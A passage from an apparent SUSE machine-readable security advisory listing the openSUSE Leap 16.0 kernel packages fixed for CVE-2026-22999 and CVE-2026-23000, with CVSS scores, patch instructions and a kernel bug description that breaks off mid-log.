"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 